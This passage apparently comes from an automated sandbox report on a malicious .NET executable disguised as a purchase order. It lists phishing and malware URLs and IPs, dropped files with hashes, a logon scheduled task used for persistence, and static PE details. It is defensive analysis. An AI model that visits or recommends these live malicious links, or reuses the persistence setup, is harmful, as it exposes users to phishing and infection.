                        http://sgk-edevlet.org/Get hashmaliciousUnknownBrowse
                        • 50.6.174.229
                        https://wsg.xwi.mybluehost.me/s;kl/silver/paiement.phpGet hashmaliciousUnknownBrowse
                        • 162.241.244.55
                        https://wsg.xwi.mybluehost.me/s;kl/silver/infospage.phpGet hashmaliciousUnknownBrowse
                        • 162.241.244.55
                        https://wsg.xwi.mybluehost.me/s;kl/silver/3dsece.phpGet hashmaliciousUnknownBrowse
                        • 162.241.244.55
                        https://wsg.xwi.mybluehost.me/s;kl/silver/3dsec.phpGet hashmaliciousUnknownBrowse
                        • 162.241.244.55
                        DOC-66642820.pdfGet hashmaliciousUnknownBrowse
                        • 162.240.102.206
                        ACPCAScan 00093847.exeGet hashmaliciousFormBookBrowse
                        • 162.0.213.94
                        Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousPhisherBrowse
                        • 162.0.217.108
                        Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 162.0.217.108
                        Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 162.0.217.108
                        Factura de proforma.exeGet hashmaliciousDBatLoader, FormBookBrowse
                        • 162.0.213.72
                        Quote #011698.exeGet hashmaliciousFormBookBrowse
                        • 162.0.213.94
                        https://www.google.com/url?q=https://google.com/url?hl%3Den%26q%3Dhttps://google.com/url?q%3D4xNZLlTBeMrz3JgT2S2x%26rct%3Duxx6lWWQSQg3lz6tBGEQ%26sa%3Dt%26esrc%3DLnMkARnwEn0HQZmQHxxK%26source%3D%26cd%3DCFK8mnhX1pEg7TmGNG8P%26cad%3DnNq1ozyXGrC1kDZTqknt%26ved%3DYxsBoVntlMlmOm9lZwVR%26uact%3D%26url%3Damp%252Fsushanta.com%252F21%252F&source=gmail&ust=1725491985982000&usg=AOvVaw2OjIR7ELr3F4rLhFIHiJIH#OvyuiE-SUREMAYYcmVpbmEuYXZpbGFAc3RndXNhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                        • 162.0.209.83
                        http://jan47nfhc.3utilities.com/#a7oOTE-SUREJACKam9obi50aGlncGluQGNoZXJva2VlYnJpY2suY29tGet hashmaliciousUnknownBrowse
                        • 162.0.209.83
                        PO#86637.exeGet hashmaliciousFormBookBrowse
                        • 162.0.213.94
                        709827261526152615.exeGet hashmaliciousFormBookBrowse
                        • 162.0.213.72
                        AMAZON-02UShttps://eu-central-1.protection.sophos.com/?d=convertcontacts.com&u=aHR0cDovL21haWwuY29udmVydGNvbnRhY3RzLmNvbS9scy9jbGljaz91cG49dTAwMS4tMkZPZ2p2UDZlSEpMUThnRkNaWFFWYVdwSW9wc2R3cTcyQzhaR2p0eWFDYmt1U25VYkpra2g5YTVWdUxMZ3VQcTA2OFpPX2otMkIzT0FHSFlyemxyWGM0d1dHdkFlaXYtMkZNV2VJQTlOWk9iOTc0YS0yQlpvdnAxN0l5aGZoeWdhczFXVkJvMTNESUhrNWF5eEpuSHB6ZEdzeXI3SEJ4eE9ZVGxlZHp3R090RUNYcFJad0ljUC0yRlU2Um1RMlZZRS0yQm5lNU4zUTZMTHNQNXJRNTNyZi0yQmRGVFc4bThFTlNFdGI2dWFtLTJGR3NrQ3lZQjBVQ3oxalh1elAtMkYxb3BIQmxaaEF3YWI5ZHFmcXhVb3hXU0puWlh5eS0yRmtFS2FJLTJGSUU1eUhCQS0zRC0zRA==&p=m&i=NWNiN2ZlZTg4MWQzYmMxNDQ2YTllMzg2&t=MzVESEtqZVpmK2lydmd6VlJBZ0dOd0VXaHNLamhvK21MK1pYQzM4L0JEUT0=&h=e14b286494664ef891348988c9e838b4&s=AVNPUEhUT0NFTkNSWVBUSVYoFOpcRSmtylFH3LId5iHD0shJ7qIqV8UAVy4ANYCuCYR3Alb2xoJLC7nF0vB_FDAfdi-bbhqFa2YYLKpVwPUnPTAMVQe9kqbfwYJ_E95MtwGet hashmaliciousHTMLPhisherBrowse
                        • 18.239.94.24
                        http://onlinesecuritycheck.weebly.com/Get hashmaliciousUnknownBrowse
                        • 18.245.187.126
                        http://subhashadapa.github.io/NetflixGet hashmaliciousHTMLPhisherBrowse
                        • 18.244.20.179
                        http://kjkesd.godaddysites.com/Get hashmaliciousUnknownBrowse
                        • 13.248.243.5
                        http://himanshu2312.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                        • 99.81.174.244
                        http://free-5480836.webadorsite.com/Get hashmaliciousHTMLPhisherBrowse
                        • 52.39.229.100
                        http://free-5484353.webadorsite.com/Get hashmaliciousHTMLPhisherBrowse
                        • 54.69.50.186
                        https://metetamsssklogin.webflow.io/Get hashmaliciousUnknownBrowse
                        • 52.222.232.144
                        https://grntt.vercel.app/Get hashmaliciousUnknownBrowse
                        • 76.76.21.123
                        http://ledgerliveco.com/Get hashmaliciousUnknownBrowse
                        • 34.252.40.201

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Purchase Order.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:true
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ibDqDkseW.exe.log

                        Download File
                        Process:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2232
                        Entropy (8bit):5.379460230152629
                        Encrypted:false
                        SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:fLHyIFKL3IZ2KRH9Oug8s
                        MD5:5EDBE2AEEFE69FB36ECED2E31AC9386F
                        SHA1:6614C7900E4994E1A3606D22916BE68F701A19D4
                        SHA-256:4275A59302475C8198165F4EB61EA2A88BD12056EA6EE5197C1BF8E6B6A6F9FD
                        SHA-512:CFBAB752BE8CB209B25F2D1AD30E08E5E7ADB2EE5B4CCE98DCFD20B05E4B1CEFFCB6551556B134A2123412C864A8A544701C846F204783D99CB58936DC086A76
                        Malicious:false
                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                        C:\Users\user\AppData\Local\Temp\3h8t0-08

                        Download File
                        Process:C:\Windows\SysWOW64\setupugc.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcue1wtf.iwl.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bt02m1ip.irm.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilssucbp.fte.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpmoe1fv.1m3.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4cpx2ym.qgj.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oftfbq32.pqw.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujfb4thx.v0x.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w35vz5ge.fb2.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\tmp83A4.tmp

                        Download File
                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1575
                        Entropy (8bit):5.110518770952651
                        Encrypted:false
                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIa5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTqvv
                        MD5:B24EC33075CBFE3B57A03B5017842D23
                        SHA1:3318F9304E90DD25C4B6F3ED584527EC5645743B
                        SHA-256:3A4FB112F10863985283752B10BF7711047988BB834FAD831F980536176CB644
                        SHA-512:151CFE752AD86BD454774825F66DCFD20389E153B6A8361451A7CEC50167B42BECAF95D58D4A17AB9AA2F9C6802B9447E70609C934520E7957C715AA7831453E
                        Malicious:true
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                        C:\Users\user\AppData\Local\Temp\tmp9641.tmp

                        Download File
                        Process:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1575
                        Entropy (8bit):5.110518770952651
                        Encrypted:false
                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIa5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTqvv
                        MD5:B24EC33075CBFE3B57A03B5017842D23
                        SHA1:3318F9304E90DD25C4B6F3ED584527EC5645743B
                        SHA-256:3A4FB112F10863985283752B10BF7711047988BB834FAD831F980536176CB644
                        SHA-512:151CFE752AD86BD454774825F66DCFD20389E153B6A8361451A7CEC50167B42BECAF95D58D4A17AB9AA2F9C6802B9447E70609C934520E7957C715AA7831453E
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                        C:\Users\user\AppData\Roaming\ibDqDkseW.exe

                        Download File
                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):693248
                        Entropy (8bit):7.883356763355056
                        Encrypted:false
                        SSDEEP:12288:8o5eOAjw6NO8AfqS2gkpv48GaC9HJTiFFdHODhBDD/I/W4j7CFFzyA9i72l:j6NO8aFz4GaCJTizdH85IeqCF9/kE
                        MD5:9EF9CFFB40D3911E46CB798DAA08B46F
                        SHA1:69BBBC4B8A61FF2FB340F6921C9D66E5F3337CFA
                        SHA-256:A1C124AA85EF07D4C39706DCD012D208576A4B08EC24106FD28D4C5847F9AFC9
                        SHA-512:8546B2A8BD28A9F0B31C938C9891598C36B463F49517D5F04D7C3A912ACE8F52588FFDE32BDDF784F1C745184A93469299F7327A218822AA4E928A3CDF4808C0
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 21%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+L.f..............0..~..........".... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...(}... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B........................H.......x?..X6......L....u...'.............................................}.......}.......}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*V..s....}......(.....*....0............(....s....}.....(....s....}.....#........#........s+...s)...}.....s....}.....s....}.....s....}.....(................#........( .....#......$@( ...(......r...p...#.......?( .....#.......@( ...(......r...p...#.......@( .....#.......@( ...(......r...p...#.......@( .....#......

                        C:\Users\user\AppData\Roaming\ibDqDkseW.exe:Zone.Identifier

                        Download File
                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.883356763355056
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:New Purchase Order.exe
                        File size:693'248 bytes
                        MD5:9ef9cffb40d3911e46cb798daa08b46f
                        SHA1:69bbbc4b8a61ff2fb340f6921c9d66e5f3337cfa
                        SHA256:a1c124aa85ef07d4c39706dcd012d208576a4b08ec24106fd28d4c5847f9afc9
                        SHA512:8546b2a8bd28a9f0b31c938c9891598c36b463f49517d5f04d7c3a912ace8f52588ffde32bddf784f1c745184a93469299f7327a218822aa4e928a3cdf4808c0
                        SSDEEP:12288:8o5eOAjw6NO8AfqS2gkpv48GaC9HJTiFFdHODhBDD/I/W4j7CFFzyA9i72l:j6NO8aFz4GaCJTizdH85IeqCF9/kE
                        TLSH:AEE412B97B1ED556CAC802B40634E3727E350E9EE412D34FCBEEACA778063197C19646
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+L.f..............0..~..........".... ........@.. ....................................@................................

                        File Icon

                        Icon Hash:4c9f33415113864d

                        Static PE Info

                        General

                        Entrypoint:0x4a9d22
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66DE4C2B [Mon Sep 9 01:15:23 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
